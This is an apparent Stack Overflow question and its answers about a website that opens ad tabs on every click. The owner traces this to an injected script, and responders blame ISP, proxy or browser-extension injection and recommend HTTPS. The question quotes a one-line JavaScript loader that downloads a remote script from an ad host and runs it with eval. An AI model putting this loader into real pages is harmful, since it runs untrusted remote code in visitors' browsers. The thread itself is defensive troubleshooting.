# Finding malware on website

Tags: javascript, malware

I'm a little bit lost on this issue, so please excuse me. I know there are other threads on SO about this but I can't find the answer.

On the site when it's loaded it doesn't matter where the user click it is open addition tab in browser with ads.

What I was able to find so far by looking at the browser console is that is loaded some js file

```
http://cdn.mecash.ru/js/replace.js
```

This file contain

```
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
```

and by looking at this `tx.js` I suspect that this is the injected by the hacker.

The problem is that I've been looking at the files on the host and can't find any include or something of this `js`..

Can someone help me and tell where or probably how can I find it?

Comment: Actually these kinds of files are often injected by `third party proxies` if used, `browser extensions installed` and `even by some ISP's` itself directly into the html code when the page is requested. Means you will not find this in your actual code on server .. but client have this js included. Better use `https` to avoid such man in middle modifications.

Comment: ISP inserting malware js  -.-

Comment: Thank's. So in other words I can stop digging in files because I would not find it. And if is from ISP I can't even contact the support? So the option here is https and/or changing my hosting provider?

Comment: changing hosting provider dosen;t help you. Just configure `https` on server.

Comment: Ah you mean my internet provider.. not the hosting provider.

Comment: Actually its a bit large problem.. YOu changed your internet provider so now you are not seeing the AD but, if someone else visiting your site is on the same ISP injecting the code.. so he will see the ad. The best solution is to use `https` to transfer data.

Answer (score 4, accepted):

Actually such kind of files are injected when the data is transmitted from server to client. 
Your actual code dosen't contains the script but, they are injected and executes on client machine..

Possibly injected by :

- Third party proxies, proxy servers used.
- Injected by ISP's in some cases.
- Malicious/Compromised browser extension installed.

You can avoid proxy/ISP injecting by transferring content over `https` instead of `http`. However, injecting done by `browswer extensions` can be avoided by uninstalling extensions only.

Comment: Thank's for the help.